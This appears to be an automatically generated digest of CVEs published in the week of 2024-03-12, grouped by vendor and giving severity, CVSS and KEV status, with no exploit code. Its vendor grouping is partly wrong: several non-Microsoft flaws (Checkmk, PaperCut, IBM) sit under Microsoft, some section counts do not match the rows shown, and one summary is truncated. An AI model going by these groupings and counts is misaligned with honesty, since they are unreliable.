Patch Tuesday — March 2024

2024-03-12 · 706 CVEs

CVEs published or modified the week of 2024-03-12, partitioned by vendor.

Microsoft (70 CVEs)

CVE             Severity  CVSS  KEV  Published   Summary
CVE-2024-21334  Critical  9.8        2024-03-12  Open Management Infrastructure (OMI) Remote Code Execution Vulnerability
CVE-2024-21400  Critical  9.0        2024-03-12  Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
CVE-2024-26198  High      8.8        2024-03-12  Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2024-26166  High      8.8        2024-03-12  Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26165  High      8.8        2024-03-12  Visual Studio Code Elevation of Privilege Vulnerability
CVE-2024-26164  High      8.8        2024-03-12  Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability
CVE-2024-26162  High      8.8        2024-03-12  Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26161  High      8.8        2024-03-12  Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26159  High      8.8        2024-03-12  Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21451  High      8.8        2024-03-12  Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21450  High      8.8        2024-03-12  Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21444  High      8.8        2024-03-12  Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21441  High      8.8        2024-03-12  Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21440  High      8.8        2024-03-12  Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21435  High      8.8        2024-03-12  Windows OLE Remote Code Execution Vulnerability
CVE-2024-21411  High      8.8        2024-03-12  Skype for Consumer Remote Code Execution Vulnerability
CVE-2024-0670   High      8.8        2024-03-11  Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges
CVE-2024-1222   High      8.6        2024-03-14  This allows attackers to use a maliciously formed API request to gain access to an API authorization level with elevated privileges.
CVE-2020-11862  High      8.6        2024-03-13  Allocation of Resources Without Limits or Throttling vulnerability in OpenText NetIQ Privileged Account Manager on Linux, Windows, 64 bit allows Flooding. This issue affects NetIQ Privileged Account Manager: before 3.7.0.2.
CVE-2024-21407  High      8.1        2024-03-12  Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-26199  High      7.8        2024-03-12  Microsoft Office Elevation of Privilege Vulnerability
CVE-2024-26182  High      7.8        2024-03-12  Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26178  High      7.8        2024-03-12  Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26176  High      7.8        2024-03-12  Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26173  High      7.8        2024-03-12  Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26170  High      7.8        2024-03-12  Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability
CVE-2024-26169  High      7.8   KEV  2024-03-12  Windows Error Reporting Service Elevation of Privilege Vulnerability
CVE-2024-21446  High      7.8        2024-03-12  NTFS Elevation of Privilege Vulnerability
CVE-2024-21442  High      7.8        2024-03-12  Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21437  High      7.8        2024-03-12  Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-21436  High      7.8        2024-03-12  Windows Installer Elevation of Privilege Vulnerability
CVE-2024-21434  High      7.8        2024-03-12  Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-21431  High      7.8        2024-03-12  Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
CVE-2024-21426  High      7.8        2024-03-12  Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-21418  High      7.8        2024-03-12  Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability
CVE-2024-21330  High      7.8        2024-03-12  Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
CVE-2024-21419  High      7.6        2024-03-12  Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2024-26204  High      7.5        2024-03-12  Outlook for Android Information Disclosure Vulnerability
CVE-2024-26190  High      7.5        2024-03-12  Microsoft QUIC Denial of Service Vulnerability
CVE-2024-21438  High      7.5        2024-03-12  Microsoft AllJoyn API Denial of Service Vulnerability
CVE-2024-21427  High      7.5        2024-03-12  Windows Kerberos Security Feature Bypass Vulnerability
CVE-2024-21421  High      7.5        2024-03-12  Azure SDK Spoofing Vulnerability
CVE-2024-21392  High      7.5        2024-03-12  .NET and Visual Studio Denial of Service Vulnerability
CVE-2024-26203  High      7.3        2024-03-12  Azure Data Studio Elevation of Privilege Vulnerability
CVE-2024-21443  High      7.3        2024-03-12  Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-1882   High      7.2        2024-03-14  This vulnerability allows an already authenticated admin user to create a malicious payload that could be leveraged for remote code execution on the server hosting the PaperCut NG/MF application server.
CVE-2024-1654   High      7.2        2024-03-14  This vulnerability potentially allows unauthorized write operations which may lead to remote code execution.
CVE-2024-21390  High      7.1        2024-03-12  Microsoft Authenticator Elevation of Privilege Vulnerability
CVE-2024-21445  High      7.0        2024-03-12  Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21439  High      7.0        2024-03-12  Windows Telephony Server Elevation of Privilege Vulnerability
CVE-2024-21433  High      7.0        2024-03-12  Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-21432  High      7.0        2024-03-12  Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-21429  Medium    6.8        2024-03-12  Windows USB Hub Driver Remote Code Execution Vulnerability
CVE-2024-26201  Medium    6.6        2024-03-12  Microsoft Intune Linux Agent Elevation of Privilege Vulnerability
CVE-2024-1884   Medium    6.5        2024-03-14  This is a Server-Side Request Forgery (SSRF) vulnerability in the PaperCut NG/MF server-side module that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.
CVE-2024-26197  Medium    6.5        2024-03-12  Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-26185  Medium    6.5        2024-03-12  Windows Compressed Folder Tampering Vulnerability
CVE-2024-1883   Medium    6.3        2024-03-14  This is a reflected cross site scripting vulnerability in the PaperCut NG/MF application server.
CVE-2024-21430  Medium    5.7        2024-03-12  Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability
CVE-2024-26181  Medium    5.5        2024-03-12  Windows Kernel Denial of Service Vulnerability
CVE-2024-26177  Medium    5.5        2024-03-12  Windows Kernel Information Disclosure Vulnerability
CVE-2024-26174  Medium    5.5        2024-03-12  Windows Kernel Information Disclosure Vulnerability
CVE-2024-26160  Medium    5.5        2024-03-12  Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-21408  Medium    5.5        2024-03-12  Windows Hyper-V Denial of Service Vulnerability
CVE-2024-20671  Medium    5.5        2024-03-12  Microsoft Defender Security Feature Bypass Vulnerability
CVE-2024-21448  Medium    5.0        2024-03-12  Microsoft Teams for Android Information Disclosure Vulnerability
CVE-2024-1223   Medium    4.8        2024-03-14  This vulnerability potentially allows unauthorized enumeration of information from the embedded device APIs.
CVE-2024-26163  Medium    4.7        2024-03-14  Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability
CVE-2024-27265  Medium    4.5        2024-03-14  IBM Integration Bus for z/OS 10.1 through 10.1.0.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.
CVE-2024-26246  Low       3.9        2024-03-14  Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

Other vendors (636 CVEs across 245 vendors)

Google · 57 CVEs

CVE             Severity  CVSS  KEV  Published   Summary
CVE-2024-27228  Critical  9.8        2024-03-11  there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-27227  Critical  9.8        2024-03-11  A malicious DNS response can trigger a number of OOB reads, writes, and other memory issues
CVE-2024-0039   Critical  9.8        2024-03-11  In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27207  Critical  9.1        2024-03-11  Exported broadcast receivers allowing malicious apps to bypass broadcast protection.
CVE-2024-23717  High      8.8        2024-03-11  In access_secure_service_from_temp_bond of btm_sec.cc, there is a possible way to achieve keystroke injection due to improper input validation.
CVE-2024-27236  High      8.4        2024-03-11  In aoc_unlocked_ioctl of aoc.c, there is a possible memory corruption due to type confusion.
CVE-2024-27226  High      8.4        2024-03-11  In tmu_config_gov_params of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27220  High      8.4        2024-03-11  In lpm_req_handler of , there is a possible out of bounds memory access due to a missing bounds check.
CVE-2024-27219  High      8.4        2024-03-11  In tmu_set_pi of tmu.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27213  High      8.4        2024-03-11  In BroadcastSystemMessage of servicemgr.cpp, there is a possible Remote Code Execution due to a use after free.
CVE-2024-27209  High      8.4        2024-03-11  there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-27208  High      8.4        2024-03-11  there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27205  High      8.4        2024-03-11  there is a possible memory corruption due to a use after free.
CVE-2024-27204  High      8.4        2024-03-11  In tmu_set_gov_active of tmu.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25993  High      8.4        2024-03-11  In tmu_reset_tmu_trip_counter of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25988  High      8.4        2024-03-11  In SAEMM_DiscloseGuti of SAEMM_RadioMessageCodec.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-25985  High      8.4        2024-03-11  In bigo_unlocked_ioctl of bigo.c, there is a possible UAF due to a missing bounds check.
CVE-2024-22005  High      8.4        2024-03-11  there is a possible Authentication Bypass due to improperly used crypto.
CVE-2024-27233  High      7.8        2024-03-11  In ppcfw_init_secpolicy of ppcfw.c, there is a possible permission bypass due to uninitialized data.
CVE-2024-27224  High      7.8        2024-03-11  In strncpy of strncpy.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27222  High      7.8        2024-03-11  In onSkipButtonClick of FaceEnrollFoldPage.java, there is a possible way to access the file the app cannot access due to Intent Redirect GRANT_URI_PERMISSIONS Attack.
CVE-2024-27221  High      7.8        2024-03-11  In update_policy_data of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27212  High      7.8        2024-03-11  In init_data of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27210  High      7.8        2024-03-11  In policy_check of fvp.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25992  High      7.8        2024-03-11  In tmu_tz_control of tmu.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-25986  High      7.8        2024-03-11  In ppmp_unprotect_buf of drm_fw.c, there is a possible compromise of protected memory due to a logic error in the code.
CVE-2024-22008  High      7.8        2024-03-11  In config_gov_time_windows of tmu.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-0051   High      7.8        2024-03-11  In onQueueFilled of SoftMPEG4.cpp, there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-0050   High      7.8        2024-03-11  In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a missing validation check.
CVE-2024-0049   High      7.8        2024-03-11  In multiple locations, there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-0048   High      7.8        2024-03-11  In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses.
CVE-2024-0046   High      7.8        2024-03-11  In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code.
CVE-2024-27211  High      7.7        2024-03-11  In AtiHandleAPOMsgType of ati_Main.c, there is a possible OOB write due to a missing null check.
CVE-2024-27229  High      7.5        2024-03-11  In ss_SendCallBarringPwdRequiredIndMsg of ss_CallBarring.c, there is a possible null pointer deref due to a missing null check.
CVE-2024-27206  High      7.5        2024-03-11  there is a possible out of bounds read due to a missing bounds check.
CVE-2024-22011  High      7.5        2024-03-11  In ss_ProcessRejectComponent of ss_MmConManagement.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-22009  High      7.1        2024-03-11  In init_data of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25987  Medium    6.7        2024-03-11  In pt_sysctl_command of pt.c, there is a possible out of bounds write due to an incorrect bounds check.
CVE-2024-0044   Medium    6.7        2024-03-11  In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation.
CVE-2024-0045   Medium    6.5        2024-03-11  In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation.
CVE-2024-25990  Medium    6.4        2024-03-11  In pktproc_perftest_gen_rx_packet_sktbuf_mode of link_rx_pktproc.c, there is a possible out of bounds write due to a race condition.
CVE-2024-25984  Medium    6.2        2024-03-11  In dumpBatteryDefend of dump_power.cpp, there is a possible out of bounds read due to a heap buffer overflow.
CVE-2024-22007  Medium    6.2        2024-03-11  In constraint_check of fvp.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27234  Medium    5.9        2024-03-11  In fvp_set_target of fvp.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-25989  Medium    5.9        2024-03-11  In gpu_slc_liveness_update of pixel_gpu_slc.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27237  Medium    5.5        2024-03-11  In wipe_ns_memory of nsmemwipe.c, there is a possible incorrect size calculation due to a logic error in the code.
CVE-2024-27235  Medium    5.5        2024-03-11  In plugin_extern_func of , there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27218  Medium    5.5        2024-03-11  In update_freq_data of , there is a possible out of bounds read due to a missing bounds check.
CVE-2024-22010  Medium    5.5        2024-03-11  In dvfs_plugin_caller of fvp.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-0047   Medium    5.5        2024-03-11  In writeUserLP of UserManagerService.java, device policies are serialized with an incorrect tag due to a logic error in the code.
CVE-2024-22006  Medium    5.3        2024-03-11  OOB read in the TMU plugin that allows for memory disclosure in the power management subsystem of the device.
CVE-2024-27230  Medium    5.1        2024-03-11  In ProtocolPsKeepAliveStatusAdapter::getCode() of protocolpsadapter.cpp, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27223  Medium    5.1        2024-03-11  In EUTRAN_LCS_DecodeFacilityInformationElement of LPP_LcsManagement.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27225  Medium    4.4        2024-03-11  In sendHciCommand of bluetooth_hci.cc, there is a possible out of bounds read due to a heap buffer overflow.
CVE-2024-25991  Low       3.3        2024-03-11  In acpm_tmu_ipc_handler of tmu_plugin.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-0053   Low       3.3        2024-03-11  In getCustomPrinterIcon of PrintManagerService.java, there is a possible way to view other user's images due to a confused deputy.
CVE-2024-0052   Low       3.3        2024-03-11  In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check.

Linux · 48 CVEs

CVE             Severity  CVSS  KEV  Published   Summary
CVE-2021-47135  High      7.8        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: mt76: mt7921: fix possible AOOB issue in mt7921_mcu_tx_rate_report Fix possible array out of bound access in mt7921_mcu_tx_rate_report.
CVE-2021-47131  High      7.8        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: net/tls: Fix use-after-free after the TLS device goes down and up When a netdev with active TLS offload goes down, tls_device_down is called to stop the offload and tear…
CVE-2021-47123  High      7.8        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: io_uring: fix ltout double free on completion race Always remove linked timeout on io_link_timeout_fn() from the master request link list, otherwise we may get use-after…
CVE-2021-47118  High      7.8        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: pid: take a reference when initializing `cad_pid` During boot, kernel_init_freeable() initializes `cad_pid` to the init task's struct pid.
CVE-2021-47111  High      7.8        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: xen-netback: take a reference to the RX task thread Do this in order to prevent the task from being freed if the thread returns (which can be triggered by the frontend)…
CVE-2024-26619  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: riscv: Fix module loading free order Reverse order of kfree calls to resolve use-after-free error.
CVE-2024-26616  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: btrfs: scrub: avoid use-after-free when chunk length is not 64K aligned [BUG] There is a bug report that, on a ext4-converted btrfs, scrub leads to various problems, inc…
CVE-2024-26610  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix a memory corruption iwl_fw_ini_trigger_tlv::data is a pointer to a __le32, which means that if we copy to iwl_fw_ini_trigger_tlv::data + offset while…
CVE-2024-26608  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix global oob in ksmbd_nl_policy Similar to a reported issue (check the commit b33fb5b801c6 ("net: qualcomm: rmnet: fix global oob in rmnet_policy"), my local fu…
CVE-2023-52495  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: soc: qcom: pmic_glink_altmode: fix port sanity check The PMIC GLINK altmode driver currently supports at most two ports.
CVE-2023-52494  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Add alignment check for event ring read pointer Though we do check the event ring read pointer by "is_valid_ring_ptr" to make sure it is in the buffer ra…
CVE-2023-52491  High      7.8        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: Fix use after free bug due to error path handling in mtk_jpeg_dec_device_run In mtk_jpeg_probe, &jpeg->job_timeout_work is bound with mtk_jpeg_job_timeo…
CVE-2024-26620  High      7.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: s390/vfio-ap: always filter entire AP matrix The vfio_ap_mdev_filter_matrix function is called whenever a new adapter or domain is assigned to the mdev.
CVE-2021-47132  High      7.1        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: mptcp: fix sk_forward_memory corruption on retransmission MPTCP sk_forward_memory handling is a bit special, as such field is protected by the msk socket spin_lock, inst…
CVE-2021-47110  High      7.1        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: x86/kvm: Disable kvmclock on all CPUs on shutdown Currenly, we disable kvmclock from machine_shutdown() hook and this only happens for boot CPU.
CVE-2024-26630  High      7.1        2024-03-13  In the Linux kernel, the following vulnerability has been resolved: mm: cachestat: fix folio read-after-free in cache walk In cachestat, we access the folio from the page cache's xarray to compute its page offset, and check for its dirty…
CVE-2024-26617  High      7.0        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: fs/proc/task_mmu: move mmu notification mechanism inside mm lock Move mmu notification mechanism inside mm lock to prevent race condition in other components which depen…
CVE-2021-47134  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: efi/fdt: fix panic when no valid fdt found setup_arch() would invoke efi_init()->efi_get_fdt_params().
CVE-2021-47133  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: HID: amd_sfh: Fix memory leak in amd_sfh_work Kmemleak tool detected a memory leak in the amd_sfh driver.
CVE-2021-47128  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: bpf, lockdown, audit: Fix buggy SELinux lockdown permission checks Commit 59438b46471a ("security,lockdown,selinux: implement SELinux lockdown") added an implementation…
CVE-2021-47127  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: ice: track AF_XDP ZC enabled queues in bitmap Commit c7a219048e45 ("ice: Remove xsk_buff_pool from VSI structure") silently introduced a regression and broke the Tx side…
CVE-2021-47126  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix KASAN: slab-out-of-bounds Read in fib6_nh_flush_exceptions Reported by syzbot: HEAD commit: 90c911ad Merge tag 'fixes' of git://git.kernel.org/pub/scm..
CVE-2021-47125  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: sch_htb: fix refcount leak in htb_parent_to_leaf_offload The commit ae81feb7338c ("sch_htb: fix null pointer dereference on a null new_q") fixes a NULL pointer dereferen…
CVE-2021-47124  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: io_uring: fix link timeout refs WARNING: CPU: 0 PID: 10242 at lib/refcount.c:28 refcount_warn_saturate+0x15b/0x1a0 lib/refcount.c:28 RIP: 0010:refcount_warn_saturate+0x1…
CVE-2021-47122  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: net: caif: fix memory leak in caif_device_notify In case of caif_enroll_dev() fail, allocated link_support won't be assigned to the corresponding structure.
CVE-2021-47121  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: net: caif: fix memory leak in cfusbl_device_notify In case of caif_enroll_dev() fail, allocated link_support won't be assigned to the corresponding structure.
CVE-2021-47120  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: HID: magicmouse: fix NULL-deref on disconnect Commit 9d7b18668956 ("HID: magicmouse: add support for Apple Magic Trackpad 2") added a sanity check for an Apple trackpad…
CVE-2021-47119  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: ext4: fix memory leak in ext4_fill_super Buffer head references must be released before calling kill_bdev(); otherwise the buffer head (and its page referenced by b_data…
CVE-2021-47117  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: ext4: fix bug on in ext4_es_cache_extent as ext4_split_extent_at failed We got follow bug_on when run fsstress with injecting IO fault: [130747.323114] kernel BUG at fs/…
CVE-2021-47116  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: ext4: fix memory leak in ext4_mb_init_backend on error path.
CVE-2021-47114  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix data corruption by fallocate When fallocate punches holes out of inode size, if original isize is in the middle of last cluster, then the part from isize to t…
CVE-2021-47113  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: btrfs: abort in rename_exchange if we fail to insert the second ref Error injection stress uncovered a problem where we'd leave a dangling inode ref if we failed during…
CVE-2021-47112  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: x86/kvm: Teardown PV features on boot CPU as well Various PV features (Async PF, PV EOI, steal time) work through memory shared with hypervisor and when we restore from…
CVE-2021-47109  Medium    5.5        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: neighbour: allow NUD_NOARP entries to be forced GCed IFF_POINTOPOINT interfaces use NUD_NOARP entries for IPv6.
CVE-2024-26629  Medium    5.5        2024-03-13  In the Linux kernel, the following vulnerability has been resolved: nfsd: fix RELEASE_LOCKOWNER The test on so_count in nfsd4_release_lockowner() is nonsense and harmful.
CVE-2024-26618  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: arm64/sme: Always exit sme_alloc() early with existing storage When sme_alloc() is called with existing storage and we are not flushing we will always allocate new stora…
CVE-2024-26615  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: net/smc: fix illegal rmb_desc access in SMC-D connection dump A crash was found when dumping SMC-D connections.
CVE-2024-26612  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: netfs, fscache: Prevent Oops in fscache_put_cache() This function dereferences "cache" and then checks if it's IS_ERR_OR_NULL().
CVE-2024-26611  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: xsk: fix usage of multi-buffer BPF helpers for ZC XDP Currently when packet is shrunk via bpf_xdp_adjust_tail() and memory type is set to MEM_TYPE_XSK_BUFF_POOL, null pt…
CVE-2023-52498  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: PM: sleep: Fix possible deadlocks in core system-wide PM code It is reported that in low-memory situations the system-wide resume core code deadlocks, because async_sche…
CVE-2023-52493  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Drop chan lock before queuing buffers Ensure read and write locks for the channel are not taken in succession by dropping the read lock from parse_xfer_e…
CVE-2023-52490  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: mm: migrate: fix getting incorrect page mapping during page migration When running stress-ng testing, we found below kernel crash after a few hours: Unable to handle ke…
CVE-2023-52488  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO The SC16IS7XX IC supports a burst mode to access the FIFOs where the initial register address…
CVE-2023-52487  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix peer flow lists handling The cited change refactored mlx5e_tc_del_fdb_peer_flow() to only clear DUP flag when list of peer flows has become empty.
CVE-2023-52486  Medium    5.5        2024-03-11  In the Linux kernel, the following vulnerability has been resolved: drm: Don't unref the same fb many times by mistake due to deadlock handling If we get a deadlock after the fb lookup in drm_mode_page_flip_ioctl() we proceed to unref th…
CVE-2023-52608  Medium    4.7        2024-03-13  In the Linux kernel, the following vulnerability has been resolved: firmware: arm_scmi: Check mailbox/SMT channel for consistency On reception of a completion interrupt the shared memory area is accessed to retrieve the message header at…
CVE-2021-47129  Medium    4.6        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: skip expectations for confirmed conntrack nft_ct_expect_obj_eval() calls nf_ct_ext_add() for a confirmed conntrack entry.
CVE-2021-47130  Medium    4.4        2024-03-15  In the Linux kernel, the following vulnerability has been resolved: nvmet: fix freeing unallocated p2pmem In case p2p device was found but the p2p pool is empty, the nvme target is still trying to free the sgl from the p2p pool instead o…

N/a · 44 CVEs

CVE             Severity  CVSS  KEV  Published   Summary
CVE-2024-28354  Critical  10.0       2024-03-15  There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01.
CVE-2024-25139  Critical  10.0       2024-03-14  In TP-Link Omada er605 1.0.1 through (v2.6) 2.2.3, a cloud-brd binary is susceptible to an integer overflow that leads to a heap-based buffer overflow.
CVE-2024-28383  Critical  9.8        2024-03-14  Tenda AX12 v1.0 v22.03.01.16 was discovered to contain a stack overflow via the ssid parameter in the sub_431CF0 function.
CVE-2024-28388  Critical  9.8        2024-03-14  SQL injection vulnerability in SunnyToo stproductcomments module for PrestaShop v.1.0.5 and before, allows a remote attacker to escalate privileges and obtain sensitive information via the StProductCommentClass::getListcomments method.
CVE-2024-28553  Critical  9.8        2024-03-12  Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the entrys parameter fromAddressNat function.
CVE-2024-28535  Critical  9.8        2024-03-12  Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the mitInterface parameter of fromAddressNat function.
CVE-2024-25331  Critical  9.3        2024-03-12  DIR-822 Rev.
CVE-2024-26503  Critical  9.1        2024-03-14  Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint.
CVE-2024-28353  High      8.8        2024-03-15  There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01.
CVE-2023-50677  High      8.8        2024-03-14  An issue in NETGEAR-DGND4000 v.1.1.00.15_1.00.15 allows a remote attacker to escalate privileges via the next_file parameter to the /setup.cgi component.
CVE-2024-28424  High      8.8        2024-03-14  zenml v0.55.4 was discovered to contain an arbitrary file upload vulnerability in the load function at /materializers/cloudpickle_materializer.py.
CVE-2024-25228  High      8.8        2024-03-14  Vinchin Backup and Recovery 7.2 and Earlier is vulnerable to Authenticated Remote Code Execution (RCE) via the getVerifydiyResult function in ManoeuvreHandler.class.php.
CVE-2024-27758  High      8.4        2024-03-12  In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution.
CVE-2024-28404  High      8.0        2024-03-15  TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in MAC Filtering under the Firewall Page.
CVE-2024-28338  High      8.0        2024-03-12  A login bypass in TOTOLINK A8000RU V7.1cu.643_B20200521 allows attackers to login to Administrator accounts via providing a crafted session cookie.
CVE-2024-28340  High      7.5        2024-03-12  An information leak in the currentsetting.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.
CVE-2023-32666  High      7.2        2024-03-14  On-chip debug and test interface with improper access control in some 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local ac…
CVE-2023-32282  High      7.2        2024-03-14  Race condition in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-25325  High      7.1        2024-03-12  SQL injection vulnerability in Employee Management System v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to the txtemail parameter in the login.php.
CVE-2024-28816  High      7.1        2024-03-11  Student Information Chatbot a0196ab allows SQL injection via the username to the login function in index.php.
CVE-2023-35191  Medium    6.8        2024-03-14  Uncontrolled resource consumption for some Intel(R) SPS firmware versions may allow a privileged user to potentially enable denial of service via network access.
CVE-2023-32633  Medium    6.7        2024-03-14  Improper input validation in the Intel(R) CSME installer software before version 2328.5.5.0 may allow an authenticated user to potentially enable escalation of privilege via local access.
CVE-2023-28389  Medium    6.7        2024-03-14  Incorrect default permissions in some Intel(R) CSME installer software before version 2328.5.5.0 may allow an authenticated user to potentially enable escalation of privilege via local access.
CVE-2023-39368  Medium    6.5        2024-03-14  Protection mechanism failure of bus lock regulator for some Intel(R) Processors may allow an unauthenticated user to potentially enable denial of service via network access.
